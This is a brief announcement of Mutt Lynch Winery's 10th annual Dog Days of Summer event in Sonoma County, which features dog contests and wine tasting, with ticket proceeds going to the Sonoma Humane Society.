Mutt Lynch Winery will celebrate its 10th annual Dog Days of Summer event on Saturday, August 3. The ultra dog-friendly destination outside Healdsburg in Sonoma County throws the bash every year for people who are wild about both wine and dogs. Of course furry family members are also cordially invited.
The festive day will include costume and singing contests for dogs, dog-themed music, and other canine-centric activities – along with wine tasting for the human contingent. Mutt Lynch wines consistently garner awards and are whimsically named in honor of canines, including Unleashed Chardonnay and Portrait of a Mutt Zinfandel.
“We have so much fun with the Dog Days of Summer events,” says Brenda Lynch, the winery’s owner and winemaker. “Quite frankly, it’s an honor to be a party animal when you know the beneficiary is an organization as deserving as the Sonoma Humane Society.”
The Sonoma Humane Society (SHS, sonomahumane.org) is a “life-oriented” shelter that guarantees adoptable animals are never euthanized due to age or lack of space. The closure of the Healdsbug animal shelter earlier this year places an extra burden on SHS and Mutt Lynch will donate 100% of ticket proceeds from Dog Days of Summer to help out.
